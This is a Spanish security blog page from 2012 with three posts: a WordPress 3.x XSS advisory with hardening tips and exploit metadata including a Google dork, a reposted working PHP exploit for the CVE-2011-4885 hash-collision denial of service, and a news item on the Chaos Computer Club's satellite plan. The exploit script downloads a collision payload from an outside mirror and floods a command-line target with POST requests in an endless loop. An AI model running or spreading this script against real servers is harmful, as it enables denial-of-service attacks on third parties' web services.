RSS

XSS Wordpress 3.x PoC

jueves, 5 de enero de 2012


Se ha reportado una vulnerabilidad crítica de XSS en WordPress 3.x que permitiría realizar un ataque de cross-site scripting (XSS) en un equipo afectado. El impacto de esta alerta se ha clasificado como crítica

Se recomienda 
actualizar a WordPress 3.3.1 y realizar un mantenimiento y actualización continua sobre todos los complementos utilizados.

Otras recomendaciones importantes:

·         Utilizar un Firewall de Aplicación Web (WAF) Recomiendo IMPERVA in the Cloud
·         Realizar un proceso de aseguramiento (hardening) del servidor utilizado. Principalmente del sistema operativo, de la base de datos (También existen Firewall de Bases de Datos), del servidor web y del lenguaje PHP (Recuerden la Colisión de Hashes de los diferente lenguajes). 
·         No utilizar programas, complementos, módulos o agregados en ambientes de producción sin realizar pruebas de seguridad. Tener en cuenta que muchos de los complementos disponibles no cuentan con una codificación que minimice los riesgos de seguridad.
·         Remover todo complemento o módulo que no sea necesario o utilizado y mantener actualizados tanto la aplicación WordPress, como todos los complementos utilizados.

Ahora lo entretenido, la prueba de concepto PoC:

Así se ve en el Browser:











Detalle de la Falla:
# Exploit Title: Reflected Cross Site Scripting in wordpress 3.3
# Google Hack: intext:"Proudly powered by WordPress"
# Date: 2.Jan.2012
# Author: Aditya Modha, Samir Shah
# Greetz: Jigar Soni, Mr 52
# Software Link: http://www.wordpress.org/download/
# Version: 3.3
# Tested on: apache
# CVE :  UPS ¡!!!!

PoC - PHP Hashtables Denial of Service

miércoles, 4 de enero de 2012


Este es uno de los exploit (Lenguaje PHP) disponibles para el ataque expuesto por   Julian | zeri y Alexander ‘alech’ Klink  en la  Chaos Communication Congress. Cortesía de Exploit-DB y confeccionado por http://www.infodox.co.cc/.

# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service
Exploit
 # Date: 1/1/12
 # Author: infodox
 # Software Link: php.net
 #
Version: 5.3.*
 # Tested on: Linux
 # CVE : CVE-2011-4885

Exploit

/----------------------------------------------------/

/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885

Mirrors List:
http://www.exploit-db.com/sploits/hashcollide.txt
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing

Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
 echo "firing";
 $ch = curl_init("$targ");
 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
 curl_exec($ch);
 curl_close($ch);
 echo "[+] Voly Sent!";
}
?>

Chaos Communication Congress 2011 - Slide

Ya están disponibles todas las presentaciones de la Conferencia Chaos Communication Congress… una de las charlas que ha dado mucho que hablar, y a ocupado gran parte de los sitios de news, es la de  Julian | zeri y Alexander ‘alech’ Klink, donde se muestra como provocar un DoS a las aplicaciones web construidas con gran parte de los lenguajes de programación disponible.

Disertante
Evento

Hackers al espacio & algo más

martes, 3 de enero de 2012


El grupo de hackers Chaos Computer Club (CCC) está realizando un proyecto con el que esperan conseguir fondos para enviar un satélite al espacio desde el que poder operar sin control ni censura para realizar sus actividades. Los hackers aseguran que es una forma de evitar las medidas de control y censura que hay en Internet.

El proyecto se identifica como Red Global Hackerspace y tiene como objetivo el lanzamiento al espacio de satélites que libres del control y la posible censura de ningún órgano mundial. Se trata de un proyecto con meses de desarrollo, pero que ha sido presentado de forma oficial en el Chaos Communication Congress de Berlín, uno de los encuentros de hackers más conocidos en todo el mundo. 

Durante el evento, la aprobación de la regulación SOPA en Estados Unidos ha sido una de las cuestiones más debatidas. Los hackers se han mostrado totalmente en contra de esa regulación de la Red. Lo que para algunos es una herramienta para la protección de los derechos de propiedad, para otros es una forma de censura y represión de los derechos de los internautas. 

Para luchar contra ese control de la Red y poder realizar sus actividades libremente, los hackers han propuesto crear su propia red de satélites espaciales. En caso de conseguir enviar al espacio los satélites, los hackers cuentan con que actualmente no hay una legislación vigente que pudiese impedir su utilización. El resultado sería una red de conexión sin ningún tipo de control, en el que los hackers podrían realizar sus actividades sin que haya agentes de supervisión de las actividades. 

Según la BBC, los hackers ya han realizado experimentos para el envío de satélites, utilizando medios discretos que no han conseguido un éxito concreto. El objetivo de los hackers que han planteado el proyecto en el Chaos Communication Congress ha sido el de movilizar a la comunidad e intentar encontrar financiación. El dinero y los conocimientos técnicos son los principales problemas de la iniciativa, que siendo ambiciosa, también plantea la posibilidad en el futuro, en unos 23 años, de mandar a un hombre al espacio. 

Las implicaciones del éxito del proyecto son que los hackers conseguirían una red de acceso a Internet sin control. Por una parte, esa red sería libre y nadie podría censurarla, pero en el lado negativo, la falta de control podría propiciar el lanzamiento de ataques más peligrosos y sofisticados de los que hay actualmente. Por el momento los hackers continúan buscando financiación y apoyo logístico para hacer realidad el proyecto, pero parece que el futuro de la red y su seguridad pasará por el espacio.


En la conferencia también se dio a conocer una vulnerabilidad en gran parte de los lenguajes de programación, la cual provoca un DoS sobre el servicio. Más detalles en el siguiente link:

Welcome

Con la tecnología de Blogger.